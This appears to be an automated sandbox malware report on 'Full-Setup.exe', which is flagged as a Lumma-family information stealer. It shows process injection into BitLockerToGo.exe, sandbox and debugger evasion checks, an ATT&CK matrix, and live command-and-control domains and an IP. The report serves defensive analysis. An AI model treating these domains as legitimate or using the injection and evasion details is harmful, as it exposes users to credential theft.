scalar encodingmissing type constraintunbalanced label scopesobject already resolvedhtml/template:%s:%d: %s%q in unquoted attr: %qtimeseries: num < 0, %vAlpcGetMessageAttributeNtAlpcAcceptConnectPortImageList_GetImageCountImageList_SetImageCountDwmSetPresentParametersSetConsoleTextAttributeQueryPerformanceCounterGetClipboardFormatNameWaes7z: Read after Closebzip2: Read after Closedelta: Read after Closelzma2: Read after Closeccm: invalid nonce sizeunknown character widthwhile scanning an alias%s (and %d more errors)illegal byte order markinvalid column number: invalid radix point in unknown escape sequencebrotli: excessive inputSIMPLE_HUFFMAN_ALPHABETblock checksum mismatchno tree selectors givendata exceeds block sizelz4: invalid block sizelzma: wrong chunk state%w: got %x; expected %xfloating point exceptionconnection reset by peerlevel 2 not synchronizedlink number out of rangeout of streams resourcesfunction not implementedstructure needs cleaningnot supported by windowsCertFreeCertificateChainCreateToolhelp32SnapshotGetUserProfileDirectoryWSA Pacific Standard TimeSA Eastern Standard TimeUS Eastern Standard TimeSA Western Standard TimeMontevideo Standard TimeMagallanes Standard TimePacific SA Standard TimeAzerbaijan Standard TimeBangladesh Standard TimeNorth Asia Standard TimeCape Verde Standard Timeapplication/octet-streamgoogle.protobuf.DurationRequired flag %q not setCLI_TEMPLATE_ERROR_DEBUGCLI TEMPLATE ERROR: %#vmemstr_a02208bd-3
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00410B442_2_00410B44
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004390402_2_00439040
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040C0702_2_0040C070
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004010002_2_00401000
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040B0D02_2_0040B0D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042BEE72_2_0042BEE7
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004490AC2_2_004490AC
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004491902_2_00449190
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004291A02_2_004291A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004282022_2_00428202
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042C2E02_2_0042C2E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004012952_2_00401295
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040134C2_2_0040134C
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004323D02_2_004323D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004053802_2_00405380
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004073B02_2_004073B0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004494C02_2_004494C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004484C02_2_004484C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004474882_2_00447488
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040E5402_2_0040E540
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040B5602_2_0040B560
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040A5702_2_0040A570
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004015FB2_2_004015FB
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004495A02_2_004495A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042D6242_2_0042D624
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041E6E62_2_0041E6E6
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004037102_2_00403710
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042C7102_2_0042C710
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004087802_2_00408780
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004117B02_2_004117B0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004498A02_2_004498A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042B8B22_2_0042B8B2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004449002_2_00444900
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004489D02_2_004489D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042D9B32_2_0042D9B3
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00427A602_2_00427A60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0044AA702_2_0044AA70
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040AA302_2_0040AA30
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041FA832_2_0041FA83
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00409B672_2_00409B67
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00449B302_2_00449B30
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042ED7D2_2_0042ED7D
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00438D302_2_00438D30
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00407DE02_2_00407DE0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043ED902_2_0043ED90
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040CE302_2_0040CE30
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042BEE72_2_0042BEE7
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040FFA72_2_0040FFA7
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040EEE0 appears 173 times
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040CB10 appears 50 times
    Source: Full-Setup.exe, 00000000.00000002.2309634937.00000000016B1000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSoundpad.exe2 vs Full-Setup.exe
    Source: Full-Setup.exe, 00000000.00000002.2314493525.00000000025FA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs Full-Setup.exe
    Source: Full-Setup.exeBinary or memory string: OriginalFilenameSoundpad.exe2 vs Full-Setup.exe
    Source: Full-Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engineClassification label: mal100.troj.evad.winEXE@3/0@2/1
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043F920 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,2_2_0043F920
    Source: Full-Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Full-Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Full-Setup.exeReversingLabs: Detection: 34%
    Source: Full-Setup.exeString found in binary or memory: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine (BADINDEX)%!(NOVERB)12207031256103515625ParseFloatcomplex128t.Kind == myhostname.localhostunixpacketwsarecvmsgwsasendmsgIP address netGo = local-addrRST_STREAMEND_STREAMSet-Cookie; Expires=; Max-Age=; HttpOnly stream=%d:authorityset-cookieuser-agentkeep-aliveequivalentHost: %s
    Source: Full-Setup.exeString found in binary or memory: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedmemprofileratesemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=invalid syntax1907348632812595367431640625unsafe.Pointer on zero Valuereflect.Value.unknown methodRegSetValueExW.WithoutCancel.WithDeadline(internal error.in-addr.arpa.unknown mode: MAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAM; SameSite=LaxERR_UNKNOWN_%daccept-charsetcontent-lengthread_frame_eof{$} not at endempty wildcardparsing %q: %wunknown error unknown code: Not AcceptableDkim-Signature"OUT_OF_RANGE"ALREADY_EXISTS(line %d:%d): invalid %v: %vreserved_rangefield_presence\.+*?()|[]{}^$len of type %s^[a-f0-9]{64}$^[a-f0-9]{96}$RequestExpiredRequestTimeout^cn\-\w+\-\d+$cn-northwest-1us-isob-east-1cloud.adc-e.ukeu-isoe-west-1csp.hci.ic.govap-northeast-1ap-northeast-2ap-northeast-3ap-southeast-1ap-southeast-2ap-southeast-3ap-southeast-4aws-iso-globalfips-us-east-1fips-us-east-2fips-us-west-1fips-us-west-2boringcrypto: bad record MACControlServiceCreateServiceWIsWellKnownSidMakeAbsoluteSDOpenSCManagerWSetThreadTokenClearCommBreakClearCommErrorCreateEventExWCreateMutexExWGetTickCount64IsWow64ProcessLoadLibraryExWModule32FirstWSetConsoleModeSizeofResourceVirtualProtectVirtualQueryExCoInitializeExCoUninitializeGetShellWindowVerQueryValueWunreachable: /log/filter.go/log/helper.godata truncated
    Source: Full-Setup.exeString found in binary or memory: net/addrselect.go
    Source: Full-Setup.exeString found in binary or memory: google.golang.org/grpc@v1.64.1/internal/balancerload/load.go
    Source: Full-Setup.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
    Source: Full-Setup.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
    Source: C:\Users\user\Desktop\Full-Setup.exeFile read: C:\Users\user\Desktop\Full-Setup.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\Full-Setup.exe "C:\Users\user\Desktop\Full-Setup.exe"
    Source: C:\Users\user\Desktop\Full-Setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Users\user\Desktop\Full-Setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: d3dcompiler_47.dllJump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: Full-Setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: Full-Setup.exeStatic file information: File size 16855552 > 1048576
    Source: Full-Setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x6e1400
    Source: Full-Setup.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x6d6200
    Source: Full-Setup.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x148400
    Source: Full-Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: BitLockerToGo.pdb source: Full-Setup.exe, 00000000.00000002.2314493525.00000000025FA000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: BitLockerToGo.pdbGCTL source: Full-Setup.exe, 00000000.00000002.2314493525.00000000025FA000.00000004.00001000.00020000.00000000.sdmp
    Source: Full-Setup.exeStatic PE information: section name: .symtab
    Source: C:\Users\user\Desktop\Full-Setup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 4372Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: BitLockerToGo.exe, 00000002.00000002.2326588837.0000000002FBD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2315608551.0000000002FBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: BitLockerToGo.exe, 00000002.00000002.2326588837.0000000002F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
    Source: Full-Setup.exe, 00000000.00000002.2310325254.0000000001A5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_2-19720
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00440400 LdrInitializeThunk,2_2_00440400

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\Desktop\Full-Setup.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
    Source: Full-Setup.exe, 00000000.00000003.2290997997.0000000002720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: reinforcenh.shop
    Source: Full-Setup.exe, 00000000.00000003.2290997997.0000000002720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stogeneratmns.shop
    Source: Full-Setup.exe, 00000000.00000003.2290997997.0000000002720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fragnantbui.shop
    Source: Full-Setup.exe, 00000000.00000003.2290997997.0000000002720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: drawzhotdog.shop
    Source: Full-Setup.exe, 00000000.00000003.2290997997.0000000002720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: vozmeatillu.shop
    Source: Full-Setup.exe, 00000000.00000003.2290997997.0000000002720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: offensivedzvju.shop
    Source: Full-Setup.exe, 00000000.00000003.2290997997.0000000002720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ghostreedmnu.shop
    Source: Full-Setup.exe, 00000000.00000003.2290997997.0000000002720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: gutterydhowi.shop
    Source: Full-Setup.exe, 00000000.00000003.2290997997.0000000002720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: trustterwowqm.shop
    Source: C:\Users\user\Desktop\Full-Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2C00008Jump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44C000Jump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44F000Jump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 45E000Jump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeQueries volume information: C:\Users\user\Desktop\Full-Setup.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Full-Setup.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    311
    Process Injection
    2
    Virtualization/Sandbox Evasion
    21
    Input Capture
    11
    Security Software Discovery
    Remote Services1
    Screen Capture
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    311
    Process Injection
    LSASS Memory2
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol21
    Input Capture
    2
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell
    Logon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information
    Security Account Manager22
    System Information Discovery
    SMB/Windows Admin Shares1
    Archive Collected Data
    113
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
    Obfuscated Files or Information
    NTDSSystem Network Configuration DiscoveryDistributed Component Object Model2
    Clipboard Data
    Protocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Full-Setup.exe34%ReversingLabsWin32.Spyware.Lummastealer
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    gutterydhowi.shop
    104.21.4.136
    truetrue
      unknown
      trustterwowqm.shop
      unknown
      unknowntrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://gutterydhowi.shop/apitrue
          unknown
          stogeneratmns.shoptrue
            unknown
            reinforcenh.shoptrue
              unknown
              fragnantbui.shoptrue
                unknown
                gutterydhowi.shoptrue
                  unknown
                  offensivedzvju.shoptrue
                    unknown
                    drawzhotdog.shoptrue
                      unknown
                      ghostreedmnu.shoptrue
                        unknown
                        trustterwowqm.shoptrue
                          unknown
                          vozmeatillu.shoptrue
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.cloudflare.com/learning/access-management/phishing-attack/BitLockerToGo.exe, 00000002.00000003.2315243598.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2315608551.0000000002FBD000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://html4/loose.dtdFull-Setup.exefalse
                                unknown
                                https://DwmFlushTlsAllocIsIconicIsZoomedPtInRectSetFocusdxgi.dllFull-Setup.exefalse
                                  unknown
                                  https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureZFull-Setup.exe, 00000000.00000002.2310510440.000000000236E000.00000004.00001000.00020000.00000000.sdmpfalse
                                    unknown
                                    https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureSizesFull-Setup.exe, 00000000.00000002.2314493525.0000000002580000.00000004.00001000.00020000.00000000.sdmpfalse
                                      unknown
                                      https://login.chinacloudapi.cn/non-pointerFull-Setup.exefalse
                                        unknown
                                        http://.cssFull-Setup.exefalse
                                          unknown
                                          https://gutterydhowi.shop/RBitLockerToGo.exe, 00000002.00000002.2326588837.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://www.cloudflare.com/5xx-error-landingBitLockerToGo.exe, 00000002.00000002.2326588837.0000000002F7B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2315243598.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2315608551.0000000002FBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://gutterydhowi.shop/bBitLockerToGo.exe, 00000002.00000002.2326588837.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureFull-Setup.exe, 00000000.00000002.2310510440.0000000002146000.00000004.00001000.00020000.00000000.sdmp, Full-Setup.exe, 00000000.00000002.2310510440.000000000236E000.00000004.00001000.00020000.00000000.sdmp, Full-Setup.exe, 00000000.00000002.2312557976.0000000002446000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://gutterydhowi.shop/BitLockerToGo.exe, 00000002.00000002.2326588837.0000000002F7B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2326588837.0000000002F94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://management.azure.comnilFull-Setup.exefalse
                                                      unknown
                                                      https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signaturexSFull-Setup.exe, 00000000.00000002.2310510440.000000000236E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://.jpgFull-Setup.exefalse
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          104.21.4.136
                                                          gutterydhowi.shopUnited States
                                                          13335CLOUDFLARENETUStrue
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1521582
                                                          Start date and time:2024-09-29 00:48:09 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 5m 21s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:5
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
